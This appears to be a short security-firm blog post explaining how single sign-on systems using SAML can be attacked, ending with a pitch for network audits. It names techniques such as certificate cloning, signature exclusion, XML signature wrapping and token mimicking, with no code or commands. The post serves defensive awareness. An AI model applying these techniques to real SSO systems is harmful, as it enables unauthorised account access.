There are a few ways an attack can happen, while the initial connections are made (and all certificate info is exchanged or other info needed.
Or after the initial connection was made and now the single sign on conditions are set. I.e. the auth server will store cookies, and redirects on next ask for access.
So when the attacker tries to inject an attack they are mimicking the tokens. or the XML .
check out the following from the defconswitzerland video:
SAML Attacks Certificate Tampering
- Clones a certificate, generate a new key material
- Use a certificate signed by other official CA
SAML Attacks XML
- signature Exclusion(simply delete Signature)
- XML signature Wrapping
- Paper on breaking SAML(Be whoever you want to be 2012)
SSO is supposed to be a technology which makes accessing multiple network systems easier and safer. So if there is a way to attack it and have access then it defeats the purpose of all this defense.
Contact Us to discuss auditing your network environment